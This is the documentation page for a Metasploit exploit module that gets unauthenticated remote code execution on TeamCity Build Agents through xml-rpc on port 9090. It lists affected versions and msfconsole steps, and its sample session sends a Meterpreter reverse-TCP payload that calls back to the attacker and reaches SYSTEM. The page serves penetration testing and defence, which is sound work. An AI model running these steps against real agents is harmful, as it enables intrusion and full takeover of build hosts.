adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
53ea7e577fc516d751ccd493555eb336f27dd160
metasploit-gs/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md
T
Shelby Pace 064c79a4ae note about cmd_stager flavor
2018-11-27 14:46:19 -06:00

2.1 KiB
Raw Blame History

Description

This module allows remote code execution on TeamCity Agents configured to use bidirectional communication via xml-rpc. In bidirectional mode the TeamCity server pushes build commands to the Build Agents over port TCP/9090 without requiring authentication. Up until version 10 this was the default configuration. This module supports TeamCity agents from version 6.0 onwards.

This module makes use of both a Windows and a Linux command stager. For Linux, the echo command stager flavor was replaced with the printf command stager flavor due to portability issues associated with echo and its options.

Vulnerable Application

This module has been tested successfully with the following TeamCity Agent versions

  • TeamCity 6.0
  • TeamCity 6.5
  • TeamCity 7.0
  • TeamCity 8.0
  • TeamCity 9.0
  • TeamCity 10.0
  • TeamCity 2017
  • TeamCity 2018

Verification Steps

  1. msfconsole
  2. use exploit/multi/misc/teamcity_agent_xmlrpc_exec
  3. set RHOSTS <rhost>
  4. set payload <payload>
  5. run

Options

RPORT

Which port the TeamCity Agent is listening on (default: 9090)

CMD

If specified the module will run the specified command instead of executing the payload

Scenarios

Windows Server 2012 R2 (x64) with TeamCity Agent 2018.1

msf5 > use exploit/multi/misc/teamcity_agent_xmlrpc_exec 
msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set RHOSTS 172.16.198.149
RHOSTS => 172.16.198.149
msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set LHOST eth0
LHOST => eth0
msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > run

[*] Started reverse TCP handler on 172.16.198.150:4444 
[*] Found TeamCity Agent running build version 58245
[*] Constructing Windows payload
[*] Found compatible build config for TeamCity build 58245
[*] Successfully sent build configuration
[*] Sending stage (179779 bytes) to 172.16.198.149
[*] Meterpreter session 1 opened (172.16.198.150:4444 -> 172.16.198.149:49178) at 2018-10-03 17:21:12 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Reference in New Issue View Git Blame Copy Permalink